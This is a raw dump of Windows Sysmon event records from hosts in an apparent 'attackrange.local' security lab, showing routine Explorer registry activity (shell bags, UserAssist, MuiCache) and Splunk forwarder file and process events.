AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000001607061Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.765{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001607060Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.765{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001607059Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.765{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001607058Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.765{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.RkcybereBinary Data 13241300x80000000000000001607057Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.749{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\NavPane\ExpandedStateBinary Data 12241200x80000000000000001607056Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.749{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\NavPane 13241300x80000000000000001607055Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.749{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\NavPane\ExpandedStateBinary Data 12241200x80000000000000001607054Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.749{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\NavPane 13241300x80000000000000001607053Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.749{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\GlobalSettings\ProperTreeModuleInner\ProperTreeModuleInnerBinary Data 12241200x80000000000000001607052Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.749{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\GlobalSettings\ProperTreeModuleInner 13241300x80000000000000001607051Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.749{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\GlobalSettings\ProperTreeModuleInner\ProperTreeModuleInnerBinary Data 12241200x80000000000000001607050Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.749{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\GlobalSettings\ProperTreeModuleInner 12241200x80000000000000001607049Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.517{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\5 12241200x80000000000000001607048Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.517{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 12241200x80000000000000001607047Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.517{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\5 13241300x80000000000000001607046Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.517{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListExBinary Data 12241200x80000000000000001607045Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.517{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 13241300x80000000000000001607044Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.517{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlotsBinary Data 12241200x80000000000000001607043Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.517{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU 13241300x80000000000000001607042Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.515{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\33\Shell\SniffedFolderTypeGeneric 13241300x80000000000000001607041Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.515{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\33\Shell\CachedOfflineAvailableTimeDWORD (0x0b95291d) 13241300x80000000000000001607040Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.515{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\33\Shell\CachedOfflineAvailableDWORD (0x00000000) 12241200x80000000000000001607039Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.515{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\33\Shell 12241200x80000000000000001607038Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.515{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\5 12241200x80000000000000001607037Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.515{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 12241200x80000000000000001607036Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.515{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\5 13241300x80000000000000001607035Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.515{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListExBinary Data 12241200x80000000000000001607034Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.515{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 13241300x80000000000000001607033Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.515{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlotsBinary Data 12241200x80000000000000001607032Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.515{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU 12241200x80000000000000001607031Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.513{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\Shell\BagMRU\0\1 12241200x80000000000000001607030Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.513{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\Shell\BagMRU\0 12241200x80000000000000001607029Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.513{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\Shell\BagMRU\0\1 13241300x80000000000000001607028Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.513{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\Shell\BagMRU\MRUListExBinary Data 12241200x80000000000000001607027Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.513{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\Shell\BagMRU\0 13241300x80000000000000001607026Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.513{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\Shell\BagMRU\NodeSlotsBinary Data 12241200x80000000000000001607025Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.513{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\Shell\BagMRU 12241200x80000000000000001607024Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.512{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\5 12241200x80000000000000001607023Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.512{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 12241200x80000000000000001607022Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.511{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\5 13241300x80000000000000001607021Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.511{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListExBinary Data 12241200x80000000000000001607020Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.511{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 13241300x80000000000000001607019Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.511{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlotsBinary Data 12241200x80000000000000001607018Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.511{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU 12241200x80000000000000001607017Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.511{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\5 12241200x80000000000000001607016Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.511{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 13241300x80000000000000001607015Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.511{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListExBinary Data 12241200x80000000000000001607014Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.511{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\5 13241300x80000000000000001607013Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.511{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListExBinary Data 12241200x80000000000000001607012Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.511{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 13241300x80000000000000001607011Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.511{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlotsBinary Data 12241200x80000000000000001607010Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.511{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU 13241300x80000000000000001607009Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.495{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirectionDWORD (0x00000001) 13241300x80000000000000001607008Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.495{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PIDDWORD (0x00000004) 13241300x80000000000000001607007Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.495{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID{B725F130-47EF-101A-A5F1-02608C9EEBAC} 13241300x80000000000000001607006Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.495{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupViewDWORD (0xffffffff) 13241300x80000000000000001607005Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.495{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfoBinary Data 13241300x80000000000000001607004Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.495{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\SortBinary Data 13241300x80000000000000001607003Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.495{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSizeDWORD (0x00000030) 13241300x80000000000000001607002Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.495{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlagsDWORD (0x41200001) 13241300x80000000000000001607001Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.495{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewModeDWORD (0x00000002) 13241300x80000000000000001607000Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.495{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ModeDWORD (0x00000006) 13241300x80000000000000001606999Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.495{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid{65F125E5-7BE1-4810-BA9D-D271C8432CE3} 13241300x80000000000000001606998Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.495{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlagsDWORD (0x41200001) 13241300x80000000000000001606997Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.495{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\RevDWORD (0x00000000) 12241200x80000000000000001606996Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.495{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} 12241200x80000000000000001606995Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.495{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 13241300x80000000000000001606994Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.495{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListExBinary Data 12241200x80000000000000001606993Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.495{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 13241300x80000000000000001606992Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.495{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlotsBinary Data 12241200x80000000000000001606991Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.495{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU 11241100x80000000000000001606990Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:20.312{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606989Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:20.312{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=66BA4A5BB9699E8C49BC3D2E5A8991C2,SHA256=61A539D708B80DEA9148BF24C761D5034DFCBBA07BED16C75F10DD4A3CFCF659falsefalse - insufficient disk space 11241100x80000000000000001606988Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:20.232{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606987Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:20.232{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13D0C5145BC018BBFAC91FA1FCEFE2FA,SHA256=B44932A295856F4045543E92E35CA9A3C53B88B4C57CA7CF4DD8F995232DA7CBfalsefalse - insufficient disk space 10341000x80000000000000001095488Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.555{761B69BB-7AB8-6080-A15F-00000000BA01}65361492C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095487Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 